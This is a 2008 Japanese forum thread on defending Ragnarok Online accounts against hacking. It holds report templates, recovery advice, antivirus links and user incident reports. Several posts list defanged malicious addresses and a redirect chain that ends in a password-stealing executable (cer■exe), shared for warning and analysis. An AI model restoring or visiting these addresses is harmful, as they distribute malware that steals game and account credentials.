全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 最新50  

アカウントハック対策・セキュリティ 総合スレ

1 名前:(○口○*)さん :08/06/13 22:18 ID:hCVMN6tV0
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■

アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例及びセキュリティ全般の
話題を取り扱います。

・ 関連&参考情報アドレス (>>2)
・ 報告用&質問用テンプレ (>>3)
・ アカウントハック対応の要点とFAQ、簡易まとめ (>>4,>>5)

■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。


【過去スレ】
アカウントハック総合対策スレ9
 http://gemma.mmobbs.com/test/read.cgi/ragnarok/1195956271/
セキュリティ対策、質問・雑談スレ5
 http://enif.mmobbs.com/test/read.cgi/livero/1205488101/
それ以前のログはROセキュリティWiki(http://rosafe.rowiki.jp/)

2 名前:(○口○*)さん:08/06/13 22:18 ID:hCVMN6tV0
【参考アドレス】
・ROセキュリティWiki
  http://rosafe.rowiki.jp/
・ROアカウントハック報告スレのまとめサイト
  http://sky.geocities.jp/vs_ro_hack/
・ROアカウントハック対策スレのまとめサイトのhostsファイル追加分まとめサイト(臨時)
  http://sky.geocities.jp/ro_hp_add/
・安全の為に (BSWikiより)
  http://smith.rowiki.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
  http://lineage.paix.jp/
・セキュリティホール memo
  http://www.st.ryukoku.ac.jp/~kjm/security/memo/
・アンチウィルスメーカー各社検体提出先
  http://rosafe.rowiki.jp/index.php?%B8%A1%C2%CE%C4%F3%BD%D0%C0%E8

【このスレでよく出てくるアプリケーション】
・PeerGuardian2
  http://sky.geocities.jp/vs_ro_hack/pg2.htm

【PCにウィルス対策ソフトを導入してない方へ】
・Kaspersky Internet Security 試用版
  http://www.just-kaspersky.jp/products/try/
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
  http://www.kaspersky.co.jp/scanforvirus/
・NOD32アンチウイルス体験版
  http://www.canon-sol.jp/product/nd/trial.html

3 名前:(○口○*)さん:08/06/13 22:19 ID:hCVMN6tV0
【投稿の際の注意】
・アカハックアドレスはMMOBBSでは禁止単語になっています。
 加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
 .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレ等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。提供した情報の量と質
 に応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません

 ----------報告用テンプレ----------
● 実際にアカウントハックを受けた/怪しいアドレスを踏んだ時の報告用

【      気付いた日時          】 (被害に気付いた日時)
【不審なアドレスのクリックの有無 】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【他人にID/Passを教えた事の有無】 (Yes/No)
【他人が貴方のPCを使う可能性の有無】 (Yes/No)
【    ツールの使用の有無      】 (Yes/No、Yesの場合はそのToolの説明)
【  ネットカフェの利用の有無    】 (Yes/No)
【     OS    】 (SP等まで書く)
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【hosts変更】(有/無 [有りの場合は最終更新は何時ごろか])
【PeerGuardian2導入】(有/無 [有りの場合は参照元サイトはどこか)
【説明】 (被害状況を詳しく書く)

4 名前:(○口○*)さん:08/06/13 22:19 ID:hCVMN6tV0
【安全対策の簡易まとめ】
以下は要点となります。詳しくは関連サイトを見てください。

 ・アドレスをホイホイ踏まない。よく確認する。
 ・出所の怪しいプログラムやスクリプトを実行しない。
 ・定期的なMicrosoftUpdate及び、各種ソフト(各種Player、Reader等)のアップデートを行う
 ・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新を行う
 ・パーソナルファイアウォールソフトの導入する
   ・hostsの利用した危険ドメインのブロック
   ・PeerGuardian2を使った危険IPのブロック など
  (※hostsは定期的な更新が必要です。更新をサボりがちな人はhostsファイル更新スクリプト
    (http://acopri.rowiki.jp/index.php?hostsRenewScript)の導入も視野にいれましょう)
 ・IEの使用を止め、他のブラウザに乗り換える(Firefox、Opera等)
 ・IEを使う場合は下記を設定
  ・信頼できるSite以外ではスクリプトやActiveXを切る
   :インターネットオプションのセキュリティの部分で設定可能
  ・偽装jpg対策(IE7とIE6SP2限定。IE6SP1以前では出来ない)
   :インターネットオプション→セキュリティ→レベルのカスタマイズ
   →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

5 名前:(○口○*)さん:08/06/13 22:20 ID:hCVMN6tV0
【アカウントハック対応の要点とFAQ】
以下は要点となります。詳細な物は関連サイトをご覧下さい。

● 『アカウントハックアドレスを踏んだ』もしくは『ウィルスが見つかった』場合
 1) 速やかに感染PCのネットワークケーブルを外す
 2) 『安全な環境』から諸々のパスワードを変更
 3) ウィルス駆除 もしくは OSのクリーンインストールやPCの再セットアップを行う

注)
 ・安全確認されるまでNetworkに接続・ROクライアント起動・公式にログインは厳禁
 ・各種メッセンジャーソフトやメールクライアントの起動も避ける
 ・変更するべき物は以下のとおり
  『GungHo-IDパスワード』『アトラクションIDパスワード』『キャラパスワード』『メールアドレス』
 ・アンチウイルスソフトの過信は禁物。自信がなければ再セットアップを第1選択枝とする事
 ・対応は慎重かつ迅速に行う事。早期に対応できればアカウントハックを防げる確率が上がる

● 関連FAQ
・『安全な環境』ってどんな物?
  ウイルスの感染が無いと思われる環境です。別PCや携帯電話・据置型ゲーム機・1CD Linux等が挙げられます。
・『安全ではない環境』ってどんな物?
  インターネットカフェ等不特定多数が使用する環境。
  また知人友人のPCもインターネットカフェ並の危険があるものと考えるべきです。
・知り合いに頼んでパスワード変更してもらうのはダメ?
  いくら信頼できる友人でもパスワードを教えるのは良く有りませんし、その友人がウィルスに感染してないとも限りません。
  知り合いに頼むのは最後の手段であり、安全な環境が構築出来次第、再度パスワードを変更しましょう。
・オンラインウイルススキャンをしたいんだけど、やっぱりネットにつないじゃ駄目?
  駄目です。
・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね?
  100%の保証は出来ません。ウィルスが見つからなかった場合、チェックに使ったアンチウィルスソフトでは発見出来なかっただけです。
  安全かどうか自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです。

6 名前:(○口○*)さん:08/06/13 22:25 ID:hCVMN6tV0
テンプレを纏めてくれたセキュスレ980氏や他の人、乙でした

7 名前:(○口○*)さん:08/06/15 00:27 ID:QD9QBN5E0
前スレ埋まったのでage

8 名前:(○口○*)さん:08/06/15 00:44 ID:AeToxp2v0
【      気付いた日時          】 今しがた
【不審なアドレスのクリックの有無 】 No
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 Yes
【     OS    】 XP SP2
【使用ブラウザ 】 Opera 9.27
【WindowsUpdateの有無】 先週以前 最新の更新は当たってないはず
【 アンチウイルスソフト 】 AVG8.0
【 ウイルススキャン結果】 現在カスペルスキーのオンラインスキャン中
【スレログやテンプレを読んだか】 Yes
【hosts変更】 無
【PeerGuardian2導入】無
【説明】
受信メールをよく見てみたところ、7通のメールに「Part 1.2」などというファイル名のテキストが添付されていた
うち5通はガンホーアトラクションセンターからのもので、もう1通がガンホーゲームズメールマガジン、もう1通はプロバイダのUSENからのもの
開いたり保存したりはしていないから、厳密にはこれがテキストファイルなのかもわからない(アイコンが.txtと同じなだけ)
一体これは何なのだろう、何だか不気味だ
メーラーはThunderbird2.0.0.14です

9 名前:(○口○*)さん:08/06/15 00:46 ID:IMkV7jgw0
スレが変わったので、RO板TOPのリンク更新をお願いしてきました。

MMOBBS目安箱2
http://zaurak.mmobbs.com/test/read.cgi/manage/1164226754/200

>>8
メールソフト名を書け。SSでも貼れ。
多分、HTMLメールを分離してるだけだと思うが、メールソフト名もわからないから確認のしようがない。

10 名前:(○口○*)さん:08/06/15 00:49 ID:AeToxp2v0
書いてあるだろwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

もう1台のPCでもThunderbirdだけど、そっちではこの症状は出てない
もう1台のほうはカスペルスキーでこっちはAGVだから、俺はAGVが何か作用してるんじゃないかと睨んでるんだが…

11 名前:(○口○*)さん:08/06/15 01:04 ID:AeToxp2v0
もっとよく見てみたら、Part 1.2が付いてる7通だけ、本文の末尾に

「No virus found in this incoming message.
Checked by AVG.
Version: 8.0.100 / Virus Database: 270.0.0/1489 - Release Date: 2008/06/07 11:17」

とか書いてあった

どうやらAVGが仕事した痕跡と見て間違いなさそうだけどまぁ自己責任だよなぁ
触らぬ神に祟り無しだ
このテキストを開いてみようなどとも思わんが

一応、他にもThunderbirdとAVGを併用している方がいたら情報をいただければうれしいです

12 名前:(○口○*)さん:08/06/15 01:14 ID:qMSxps280
>11
ウィルスは見つからなかったと書いてあるが?
設定変えたらその辺りの挙動は変わるんじゃないかね。

AVGのチェックが不安なら、その添付ファイルを保存して
VTに投げればいい。


って、よくみたらテンプレにVT無い事に今気がついた。
Wikiのテンプレの方には入れておいた。

VirusTotal
ttp://www.virustotal.com/jp/

13 名前:(○口○*)さん:08/06/15 01:17 ID:AeToxp2v0
「No virus found in this incoming message.
Checked by AVG.」
くらい読めるっつーに
「このメッセージにウィルスは埋め込まれていない! このAVGがそう言っているのだ!」
的な意味だろ
だから俺は「どうやらAVGが仕事した痕跡と見て間違いなさそう」と書いてるんだが

>>9>>12ももう少しちゃんと読んでくれよ…

14 名前:(○口○*)さん:08/06/15 01:25 ID:qMSxps280
>13
だから、不安ならVTに投げればどうだ?と言ってる。

15 名前:(○口○*)さん:08/06/15 01:32 ID:AeToxp2v0
おk
投げてみた

結果: 0/32 (0%)

つまりウィルスではないか、はたまた未知のウィルスか、ということか

まぁどこまでも自己責任ってことだな、うん

16 名前:(○口○*)さん:08/06/15 01:34 ID:IMkV7jgw0
ID:AeToxp2v0 の理解力のなさが悪印象に残った。

17 名前:(○口○*)さん:08/06/15 01:53 ID:AeToxp2v0
「AVG Thunderbird Part1.2」でググったところあっけなく解決
AVGのウィルスチェックレポートだとかなんとか
眠くてあんまり脳が働いてないとはいえ、まずググりもしなかったのは完全に俺の落度だな


参考サイトなどには一応目を通したんだが正直ハクスレの内容とかほとんど理解できん
となると俺はやはり理解力に欠けるんだろうな…
PG2とかHosts変更とか導入したいけどさっぱり意味わからんし

18 名前:(○口○*)さん:08/06/15 02:25 ID:prxCyIaW0
俺もわからんかったけど、ここのテンプレさんとか資料室さんで勉強したらなんとか理解できたよ。
すごくわかり易く解説されているのでじっくり読んで来なされ。

19 名前:(○口○*)さん:08/06/15 04:07 ID:30/IFPcG0
>>17
導入するだけなら、こんなのもあるよ。

PG2導入解説動画(改訂版)
http://www.nicovideo.jp/watch/nm2825098

今はとりあえず、トラブルを未然に防ぐ対策だけでもやっておいて、知識は後から補う形でも損はない。

20 名前:(○口○*)さん:08/06/15 12:38 ID:jVJPNWid0
セキュWiki見てフイタ。弓手Wikiは、わざとなの?

21 名前:(○口○*)さん:08/06/15 13:14 ID:qMSxps280
弓手Wiki、今は直ってるようだ。

恐らくspam.ini.phpに269gを追加した時に、まだ罠リンクが
残ってたんだろう。
あれは編集前と編集後で単語チェックするから、罠が残ってる
状態で設定すると、削除できない状態に陥る。

それと吹くのいいが「わざとなの?」はちょっと酷い言いようだと
思うぞ。

22 名前:(○口○*)さん:08/06/15 13:26 ID:jVJPNWid0
直ってない・・・と思ったら、ローカルキャッシュクリアしたら
直ってるな。しかし、タイムスタンプ変更しないで直したか・・・思いきや
差分 ttp://hunter.rowiki.jp/index.php?cmd=diff&page=%CB%C9%B6%F1%2F%C2%CE が
おかしい。中の人が直接直したんだろうか?そうすると、キャッシュ関連で「直ってない」状態になるから
危険だよなぁ。

23 名前:(○口○*)さん:08/06/15 13:52 ID:nZ/I/0gy0
なるほど. 今日の昼にこっそり(多分ここを見たのか?)直したんだろうね.
でも直したならタイムスタンプが変わっていて欲しいね.
確かにキャッシュ無視の強制リロードが必要だった. 差分は, 見ると勘違いするしね.

24 名前:(○口○*)さん:08/06/15 14:06 ID:HtANcAQn0
今朝(2時〜3時ぐらい)にそこ見たけど何もなかった。
キャッシュが変に作用したなら、修正は昨日のうちに行われていたんじゃないか?

25 名前:(○口○*)さん:08/06/15 17:01 ID:30/IFPcG0
改竄と修正がある度に、Wikipedia(というかMediaWiki)と同様にPukiWikiでもrevertが出来たら……
と思ったら、既にプラグインがあった。
ページをリバートするPukiWikiプラグイン "revert.inc.php" - luntf.com
ttp://www.luntf.com/?revert.inc.php
これ、各Wikiでも導入を検討してもらえないものかな。

26 名前:(○口○*)さん:08/06/16 20:53 ID:FHDp0GE+0
>25
便利そうだが、かえって改竄の恐れが増えないか?
ハクに限らず一般的な意味も含めて、だが。
それに簡単に罠ページにロールバックされるとか、起きそう。

直すときにそれがあれば楽なので、Wiki管理人には導入を
検討してもらいたいが、悪戯的なトラブルが増えないかが
ちょっと気になった。

27 名前:(○口○*)さん:08/06/16 21:15 ID:/mwAW6aQ0
VirusTotalにバスター追加されてるw

28 名前:(○口○*)さん:08/06/16 22:43 ID:w02KjoY20
おいおい、バスターとVirusBusterは違うぞ。
バスターはPC-cillinなんだぜ。

……と内心ツッコミ入れつつ見に行ったら

>TrendMicro

Σ(゚д゚lll) マジだ



これでやっと御三家が揃ったわけか

29 名前:(○口○*)さん:08/06/16 23:00 ID:JMd7ye3oO
何故か俺の環境ではvirus.orgが開けなくなったから
バスター追加はありがたい

30 名前:(○口○*)さん:08/06/16 23:07 ID:wv3wnQpu0
キングソフトも乗ってくれないかなぁ。検出率がわからなくて、他人に勧めていいかわからんw

31 名前:(○口○*)さん:08/06/16 23:48 ID:0sBX0mZc0
>キングソフトも乗ってくれないかなぁ

ttp://virscan.org

32 名前:(○口○*)さん:08/06/16 23:51 ID:wv3wnQpu0
>>31
thx

>>29
PG2が中国のIPってことで弾いてたよ。

33 名前:(○口○*)さん:08/06/17 02:00 ID:NgL4jzkH0
カスペさんのオンラインスキャンはまだ直らんのかね、そういや

34 名前:(○口○*)さん:08/06/17 07:48 ID:2t5OlZcI0

ttp://www.kaspersky.com/virusscanner/
ttp://www.kaspersky.ru/virusscanner/

35 名前:(○口○*)さん:08/06/17 16:00 ID:jnCSTAfE0
うちのではその二つもできないな

36 名前:(○口○*)さん:08/06/17 16:52 ID:2t5OlZcI0
Firefox3.0リリース

37 名前:(○口○*)さん:08/06/17 18:13 ID:2t5OlZcI0
XREA対応した模様。

38 名前:(○口○*)さん:08/06/17 18:58 ID:YD4qKV6Z0
>>37
アナウンスでてたね
http://sb.xrea.com/showthread.php?t=12839

39 名前:(○口○*)さん:08/06/17 19:03 ID:6j890I2O0
>>38
すっごい 、 が多いな…
逆に読みづらい。

40 名前:(○口○*)さん:08/06/17 19:13 ID:5JG9H01X0
公式アナウンスやっとでたか
あのまま放置決め込むのかと思ったよ

xreaは個人的に嫌いじゃないんだが、最近は安定性やら何やら微妙に
なってきてるなぁ
しかしあの告知見ると、そのうち無料鯖は廃止とかになりそうだな

41 名前:(○口○*)さん:08/06/17 20:08 ID:2t5OlZcI0
言い訳まみれだなぁ。

42 名前:(○口○*)さん:08/06/17 20:13 ID:mJ5f4pOR0
サーバー数みたら260とかなってるのな…、大分増やした物だ

43 名前:(○口○*)さん:08/06/17 21:05 ID:2XFjt4e50
今の募集はs342か。
ナンバリングが1から綺麗に繋がってるとして、coreserverの方も
合わせたら軽く350以上か。

その大半が無料ユーザーで赤字部門。
有料の方もxrea+で年間2400円とかだし。

経営が成り立ってる方が不思議って気もする。

44 名前:(○口○*)さん:08/06/17 23:19 ID:R/XiqCjW0
ところでXREA使ってるWikiとRO系のページはいくつあるんだろうな

わかる範囲で軽く30は超えてるんだが

45 名前:(○口○*)さん:08/06/17 23:20 ID:mJ5f4pOR0
金払ってる人、自動だとRMT広告が入るの嫌で指定してる人
なんてのもいるんじゃないかな?

46 名前:(○口○*)さん:08/06/18 05:26 ID:pSayHY6W0
xreaはあくまで副業であって、本業のValueDomainがあってこそ成り立っているサービスではあるが。
ただ、PHP周りの自由度が高い無料鯖ゆえに、指摘されているようなspam利用が多いのも事実。
以前に上位レジストラからDNS抹消を行われた時も、spamが遠因になっていたし。
タダほど高いものは無い、と言う感じで無料サービス廃止に向かうのも時代の流れかもしれない。

47 名前:(○口○*)さん:08/06/18 19:46 ID:j0GOSbtZ0
金を払わずに利用しようって客が多くなりすぎたな。
仕事にはちゃんと対価を払う文化にならないと、この先何が起こるかわからんね。

48 名前:(○口○*)さん:08/06/18 22:11 ID:/LXmd/170
ROで課金してる人は皆さん、ガンホーゲームズの中でアバターを作って、
「マイHP」というのを作らされてると思いますが

その中のプロフィール欄やら日記に罠ブログのURLを書いておき、
友達申請を誰彼構わずして、訪問させて踏ませる輩がいます。
ご注意いただきたいと思います。

わかったのは、だんなが踏んでカスペさんに叫ばれたから…orz
(だんなはRO引退後、癌の無料ゲームユーザー)

49 名前:(○口○*)さん:08/06/18 22:27 ID:QIx5Rx/s0
>>48
そんなの今に始まった事では…。
昔の方が多かったです。

50 名前:(○口○*)さん:08/06/18 22:55 ID:/LXmd/170
>>49
既出だったのですね、申し訳ありませんでした

51 名前:(○口○*)さん:08/06/18 23:03 ID:kPItGfaT0
>>48
いまだにアバター製作をキャンセルし続けている俺みたいのもいますけどね。

52 名前:(○口○*)さん:08/06/18 23:34 ID:p2gtTXcn0
各職Wikiのリンクにtp://goddessmaria■269g■net/というURLになっています
これはアカウントハックURLなんでしょうか?Ro起動したままふんでしまいました

53 名前:(○口○*)さん:08/06/18 23:37 ID:tWzsm1NE0
修正のために何処のWikiだったかを教えていただけませんでしょうか?
いくつか見て来たけど見当たらなかったので。

54 名前:(○口○*)さん:08/06/18 23:39 ID:GQMGW42n0
■ このスレは『勇気が無くて見れないサイト解説スレ』ではありません ■

各職などと曖昧な表現をせずハッキリと

一月ほど前のcer.exeをDLさせようとしてくる様子
あとはテンプレにそった報告してくれないとわからないわ

55 名前:(○口○*)さん:08/06/18 23:46 ID:p2gtTXcn0
勇気が無くて見れないサイト解説スレはどこにあるんでしょうか?

【      気付いた日時          】 今
【不審なアドレスのクリックの有無 】 有
【他人にID/Passを教えた事の有無】 No
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 No
【     OS    】 ウィンドウズXP
【使用ブラウザ 】 IE
【WindowsUpdateの有無】 無
【 アンチウイルスソフト 】 無
【その他のSecurty対策 】 無
【 ウイルススキャン結果】 していません
【スレログやテンプレを読んだか】 今から読みます
【hosts変更】無 
【PeerGuardian2導入】無
【説明】 殴りアコプリWikiからリンク→プリーストWikiのRinkで>>52のURLを踏んでしまい
急に重くなり強制終了しました。そのブログには絵が描いてあって普通のブログみたいな感じでした・・

56 名前:(○口○*)さん:08/06/18 23:47 ID:tRI6KZO/0
>50
癌公式のそれで罠踏ませるのは、初の報告じゃないかな?
ただ手法的にはmixiやらで散々使われてるものなので
そういう意味では既出とも言える。

しかし公式のお膝元だし、癌がそれを放置してるとなれば
別の意味でヤバいわけで。

まあ何にせよ、旦那さんのPCのチェック等々頑張ってら。
後、貼られてたアドが初見かどうかの問題もあるので
罠URLが判るなら、一応テンプレに沿って報告お願いします。


>53
セキュWikiには、殴りアコプリWikiがやられてたとあった。
>殴りアコプリ MenuBar改竄→修正済(18日)。今回も *■269g■net への改竄。

他にもあるのかもしれないが、まだ見つけられず。

57 名前:(○口○*)さん:08/06/18 23:48 ID:GQMGW42n0
【使用ブラウザ 】 IE
【WindowsUpdateの有無】 無
【 アンチウイルスソフト 】 無
【その他のSecurty対策 】 無

この状態で踏んでるならアウトとしか判断しようがないかと…

58 名前:(○口○*)さん:08/06/18 23:51 ID:p2gtTXcn0
>>57
アウトという曖昧な表現をせずハッキリと
自分で言ってましたよね

59 名前:(○口○*)さん:08/06/18 23:54 ID:VDjeMEIu0
なんだこいつw
神聖かよwww

60 名前:(○口○*)さん:08/06/18 23:58 ID:tWzsm1NE0
>>55
さすがにウィンドウズアップデートもセキュリティソフトもないならば確実に喰らっていると思います。
ROにログインしている常態で踏んだのであれば、
そこからまたログインしなおしたり、アトラクションセンターにログインを試みなければまだ大丈夫。
とりあえずパスワードを入力する系のページやゲームやメッセンジャーなどには一切ログインせず
リカバリやOSの再インストするしかないですね。
ゲームにしろメッセンジャーにしろメールソフトにしろログイン系の行動を試みてはいけません。

勇気がなくて踏めない人のための鑑定スレは2chのネットワーク板などにあります。

あと、アウトというのは完全に感染しているという意味です。曖昧では無いです。

あとちょっとケンカを売っているような物腰に見えます。
焦っている気持ちはわかりますが、落ち着いてテンプレなどを読み、
キッチリした情報を書いてくれれば皆さんキッチリ答えてくれます。
まずは落ち着きましょう。

61 名前:(○口○*)さん:08/06/18 23:59 ID:p2gtTXcn0
>>60
ありがとうございました

62 名前:(○口○*)さん:08/06/19 00:10 ID:ggqtvPiT0
>ID:tRI6KZO/0
パニックして、逆上しないように。

>54が書いてるように、EXEをDLさせる罠

一応普段のように並べてみると
goddessmaria■269g■net
-->www■teamerblog■com/blog
---->www■panslog■net/wiki/index1■htm (Trojan-Downloader.JS.Agent.brl)
------>www■teamerblog■com/wiki/cer■exe (Tojan-PSW.Win32.OnLineGames.aosg)

index1■htm VT19/32 http://www.virustotal.com/analisis/44568c13c870b29aba5bb84c56d8fc93
cer■exe VT23/33 http://www.virustotal.com/analisis/90e1a6b432bc06d7103cfb112613e4a6
ノートンは擦り抜けるが、他はほぼ検出。

対応方法は>60の言うとおり。
安全な環境からPASS変更して、PCはHDDフォーマットの上OS再インストールが一番堅い。

昨今のネットを取り巻く環境では、ノーガード戦法は自殺行為。
WindowsUpdateの適用とアンチウィルスソフトの導入は、必須の行為だよ。

63 名前:48:08/06/19 00:51 ID:dkoX0G5o0
>>56
お言葉に従い報告してみます

【      踏んだ日時          】 2008/6/15(日)
【不審なアドレスのクリックの有無 】 有り http://rakushushun■269g■net 
                      別のキャラ http://www■voiceblog■jp/rakushushus/
【     OS    】 Windows XP SP3
【使用ブラウザ 】 IE7
【WindowsUpdateの有無】 6/11の最新分まで済み
【 アンチウイルスソフト 】 Kaspersky Internet Security 7.0
【その他のSecurty対策 】 Spybot S&D、ルータ
【 ウイルススキャン結果】 検出されず
【スレログやテンプレを読んだか】 愛読してます
【hosts変更】(有 昨年末辺りまでしか)
【PeerGuardian2導入】無
【説明】
>>48にあるとおり、身内が家族共用のPCで踏みました。カスペルスキーが遮断したとの警告音を発して判明しました。
ガンホーゲームズの中のマイHPというコーナーで、日記とプロフィールの欄に「ブログはこちら」などという感じで上記のアドレスが記述されていました。
日曜日に踏んだアドレスはoから始まる無意味な羅列ものでしたが、今は上段のものに差し替わっています。
最後が269g■netで終わるのは同じです。

踏んだ当日にガンホーのWEBヘルプデスクから報告しました。
(サポートセンター→WEBヘルプデスク→GungHo Games→報告する→不正行為を報告する)
日記の削除は行なわれていますが、プロフィール欄のURLは削除されても別のアドレスが書かれているようです。
また、URLの自動リンクを踏んだ時には「外部のサイトになるけど安全ですか」のワンクッションページがガンホー側で出るようになっていますが、身内は確認せずに踏んだようです。
尚、ワンクッションページから先が不正なリンクであればそのページから通報できるようになっていました。(身内はここから通報済み)

↑のアドレスに別のキャラと書きましたが、私の確認できた範囲ではこういう輩が2キャラいました。いずれのキャラも「マイ友だち」が多く(いきなり申請されても気軽に受理する人が多いようです)、それも騙される一因になっているように思います。

64 名前:(○口○*)さん:08/06/19 01:10 ID:ggqtvPiT0
>63
rakushushun■269g■net
--->www■teamerblog■com/blog/
以下略

www■voiceblog■jp/rakushushus/
--->www■teamerblog■com/blog/
以下略

カスペが検出してるので、ほぼ平気と思われる。

それと
>【hosts変更】(有 昨年末辺りまでしか)
hostsは>4にも書かれてるけど、基本的に手動更新。
一度設定したからといって、その後OKというものじゃないので
要注意。


しかし、あの公式アバターサイト、活用されてるのか……
ちょっと意外だった。

65 名前:(○口○*)さん:08/06/19 11:35 ID:y8nq04OV0
Firefox 3に早くもゼロデイの脆弱性、任意のコード実行の恐れ
ttp://www.itmedia.co.jp/news/articles/0806/19/news034.html

66 名前:(○口○*)さん:08/06/19 15:15 ID:EyrgCACv0
カスペオンラインスキャン出来るようになったね

67 名前:(○口○*)さん:08/06/19 15:29 ID:nW8rH5DE0
>>65
Firefox2にも同じ穴あり。
内容は流通していないので、広まらずに塞がれるのを待つのみ。

情報は共有できた方が良いが、危険度の高いものはあまり明かさない方がいい。

68 名前:(○口○*)さん:08/06/19 16:32 ID:410nvYt+0
>>66
マジで?
俺さっき試してもまだできない。

69 名前:(○口○*)さん:08/06/19 16:36 ID:AlmQDrMu0
一旦アンインスコすればできるぜ

70 名前:(○口○*)さん:08/06/19 20:19 ID:410nvYt+0
おk、できた。thx

71 名前:(○口○*)さん:08/06/19 22:09 ID:NSf0p+pa0
すみませんが質問です。
先日携帯ゲームのWikiにてウィルスに感染してしまいました。

"Trojan-Clicker.HTML.IFrame.il"

"Trojan-Downloader.JS.Agent.brl"

の2つが見つかったのですが、この2つは垢ハックのウイルスでしょうか?
ご存知の方いましたらよろしくお願いします。

72 名前:(○口○*)さん:08/06/19 23:43 ID:v0xcD5Pb0
>>71
ぐぐーるしてみたら
アカウントハック総合対策スレ9
っていうのが出てきたよ

73 名前:(○口○*)さん:08/06/20 12:22 ID:ptNFB2xO0
Safari3.1.2リリース

74 名前:(○口○*)さん:08/06/21 00:26 ID:zMHK5RFo0
まだ報告出てなかったか

>MS、6月の月例パッチ「MS08-030」の修正版を公開
>http://internet.watch.impress.co.jp/cda/news/2008/06/20/20015.html

75 名前:(○口○*)さん:08/06/21 01:47 ID:X10lZj+H0
XREAを食ったfccjaのswfとトロイが18日に更新されている。
XREAがまたやられるってのはちょっと考えにくいので
どこか別なところがやられる(またはやられている)予感。

76 名前:(○口○*)さん:08/06/23 15:32 ID:/b80vvNz0
保守

77 名前:(○口○*)さん:08/06/23 19:56 ID:y9QG0BBi0
今更感が強い記事だが、先日のFlashの件もあるので貼り

>「PDFウイルス」に気を付けろ
>ttp://pc.nikkeibp.co.jp/article/trend/20080609/1004520/

最後にちょっと良いこと書いてあった

>現在は、ソフトウエアの脆弱性を悪用するウイルスが“全盛”の時代である。>Adobe Readerに限らず、自分が利用しているソフトウエアを把握し、それら
>すべてを最新の状態に保つようにしたい。

ふと気になってAdobeのサイトで確認したら、AdobeReaderの8系列は
Win2kSP4以降なんだな(SP2,3は7系列まで)
MSのサポートが切れてるOSは脆弱性があってもサポートされないが
こうやって日常的に使うソフトがサポートされずに放置されるのを見ると
旧OSを使い続けるのは恐ろしいとしか

78 名前:(○口○*)さん:08/06/23 20:35 ID:Og43RMYs0
ぜ、脆弱性・・・

79 名前:(○口○*)さん:08/06/23 21:10 ID:FzPaTnOb0
>77
去年か一昨年か、IPAがWin98使い続けると危ない、と注意喚起の
発表出してたしな。
サポート切れたOSは自然と他のソフトも対応しなくなるし。

でも9x系OSとか、まだ現役とかいう人も多いんだろうなぁ……

80 名前:(○口○*)さん:08/06/23 21:28 ID:UQyEg4Jr0
旧OSの切り捨てはMicrosoftよりサードベンダのほうが早いよな。
2000はWindowsUpdateで今でもセキュリティパッチ降ってくるけど
なんとかPlayerはXP以上とかなってて。
そそ、Shockwave(FlashじゃなくてDirectorのほう)が更新されてた。

81 名前:(○口○*)さん:08/06/23 22:43 ID:UQyEg4Jr0
いちおうURI
ttp://www.adobe.com/shockwave/download/

82 名前:(○口○*)さん:08/06/24 00:51 ID:1NIiH1Qv0
>>79
完全に動かなくなるまで寿命じゃないと思ってるからだろう。
で、「メーカーの都合でなんで買い換えなきゃならないんだ。
そんなに重要ならタダでよこせ」という発想になると。

83 名前:(○口○*)さん:08/06/24 00:54 ID:NuIhrB280
外部のネットワークに接続しない環境で9x系が使われているのは結構あるな

84 名前:(○口○*)さん:08/06/24 05:11 ID:l9nefxWS0
知り合いがハックされたんだが、課金切れだったのを1DAYで課金してあったらしい

律儀に課金すんのか最近の垢ハックは・・・

85 名前:(○口○*)さん:08/06/24 05:20 ID:SyesSzWw0
癌ID事やられてたらしてくるだろ、垢次第だけど向こうはそれ以上の金になるわけだし

86 名前:(○口○*)さん:08/06/24 09:14 ID:iTsTY6Hy0
>癌ID事やられてたらしてくるだろ
これの線が濃厚だと思う。
GungHo-IDがハクされたら、アトラクションIDのPassなんて関係ない。

87 名前:(○口○*)さん:08/06/24 14:52 ID:ildQKPme0
特定のワード(垢白URL)があると書き込めないようにする
Wikiのプラグインとかないのかな。
ないよね、Wikiがまとめサイトをわざわざ参照しにいくなんて

88 名前:(○口○*)さん:08/06/24 14:57 ID:SyesSzWw0
特定のIP弾いた方が楽だと思うけど
どちらにせよ虱潰しに変わりない

89 名前:(○口○*)さん:08/06/24 15:02 ID:ATcdIjKL0
.krや.hkや.cnは弾けるが、日本のプロバイダからやられると防ぎようがないからな
ブログは承認制、閲覧者も対策なしで踏んだら自業自得ぐらいは最低でも必要

90 名前:(○口○*)さん:08/06/24 15:03 ID:iTsTY6Hy0
風-ノ=虱

漢字いっこ覚えた

91 名前:(○口○*)さん:08/06/24 15:22 ID:LIT4B+FF0
>>87
spam.ini.php
